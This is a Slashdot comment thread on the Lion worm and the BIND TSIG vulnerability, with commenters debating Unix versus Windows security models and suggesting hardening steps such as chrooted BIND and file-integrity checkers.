That is how high the quality bar has been set by Linux dittoheads: if it doesn't work out of the box is your fault.
Re:rootness and capabilities (Score:2)
I see now the error of my ways. Car require breaks, but an OS which is touted as the best medium size web server available does not require decent security or a decent file system... No siree, you need to download it from some place else, after all why would a web server need to be secure?
Re:rootness and capabilities (Score:2)
We are not talking here about some specialized mathematical simulation software. We are talking about the security model of an OS which is touted as the system of choice for web servers, or the delete/backspace keys, which, last I checked, are used often.
To you those things are optional, which only confirms my point: when Linux sucks, the dittoheads copout with "just add package XYZ".
Re:rootness and capabilities (Score:3)
This is one way in which Linux/Unix sucks. The security model is brain dead. It might look good compared to Windoze, but if you have ever used a mainframe you would know what I'm talking about.
Yet the Linux community seems more interested in pointing out the ways in which Linux is better than Windows instead of adressing real concerns with the *nix model... (Miguel de Icaza being the exception that proves the rule).
Here's a list
- Security in *nix sucks
- X-windows sucks
- the xterm gui-cli interface sucks
- all the shells suck (with the possible exception of zsh).
- file system in *nix sucks
- netscape in *nix sucks
any others?Flame away
Re:Virii, OS acceptance, and making fun (Score:2)
Re:Virii, OS acceptance, and making fun (Score:2)
Patch... (Score:4)
Kidding, kidding. But only half. Maybe not even half.
Re:/. presses about to fall over (too slanted!) (Score:2)
Linux is *not* an operating system, it's a kernel.
Re:regardless... (Score:2)
Well, yes and no. I know with a dial-up box, I'm less vulnerable to extended attacks (the evil cracker rooted my box, installed 12 backdoors, but couldn't find it again) and I'm more likely to notice an attack in progress (gee, the modem lights're blinking even though I'm not downloading anything).
However, that being said, dynamic IP "security" should be lumped into the same boat as "security through obscurity" -- all other things being equal, they help (admittedly, I'm stretching that "being equal" a bit to cover an equal amount of scrutiny for the obscured procedure as it would've gotten out in the open), but it's considered very bad form to rely on them as actual security.
No, use BIND *intelligently* instead (Score:2)
As for the latest (January 29) vulnerability (TSIG), and the worm that now exploits it, this is just yet another reason to run "named" unprivileged and chroot()'ed, and to keep up to date with advisories and patches...
As for the "$500 cash reward" for finding a security hole in djbdns, don't forget to read the fine print in the guarantee [cr.yp.to]: "My judgment is final as to what constitutes a security hole in djbdns". Feh!
My ancestors evolved from primordial ooze, and all I got was this lousy Existential Angst!
Rather worringly (Score:2)
--
It can be nasty.... (Score:2)
Re:rootness and capabilities (Score:2)
Look, go into the Services, right-click on one, select the "Log On" tab, then tell me what you see there.... yup, that's right. You can select what security context the process runs under, which carries all the associated rights and/or restrictions.
-------
-- russ
"You want people to think logically? ACK! Turn in your UID, you traitor!"
Re:rootness and capabilities (Score:3)
IIS creates a user, usually called IUSR_machinename, which is the process under which IIS runs. Therefore, if I restrict that user from accessing anything but the INETPUB directory, including utils like CMD.EXE, system files, etc...., then even if someone can get in under that process, they won't be able to do much.
Then again, that's the flexibility you get when you have true file ACLs and can run services under separate security contexts.
-------
-- russ
"You want people to think logically? ACK! Turn in your UID, you traitor!"
Slashdot Spin Machine (Score:4)
Re:How is this a Linux problem? (Score:2)
Most NT/2000 admins add the end user of a workstation to the administrator group because most PC users are not used to dealing with file perms or a multiuser OS. This would be an expectation problem. (managing expectations is a bitch).
The problems with Outlook have been solved by adding a warning box.
In either case mentioned above a hostile program , ran by an end user can change *any* system file it wants to. This would not be possible on a OS based on Unix.
2.) This is a BIND problem that only effects x86 linux platforms because that is what the binaries of the rootkit were compiled for. This problem could potentially effect every *nix AND win32 based systems that run BIND. The main problem here is that BIND runs as root. This situation can be fixed by: upgrading to a newer version of BIND, by running djbdns, by running a chrooted BIND, etc.
LAME!! (Score:4)
Why would I want to run a closed source worm on my system???
Tripwirelike product (Score:3)
FreeVeracity [freeveracity.org]
Tripwire is now a pay for play product, so I suggest using something like this which is open source/free and just as good
Secret Mir Casualty [space.cnn.comquery]
Worms and Anti-worms (Score:2)
(LionFind) has been released. So, I have to ask...
why not write LionFind so it can break into
machines infected by Lion through the security
hole created by Lion, inform the machine's owner,
close the hole, and then use that box to look for
the next box to disinfect?
-G.
--
Signature temporarily unavailable. Please try again.
Everybody should have seen it coming... (Score:2)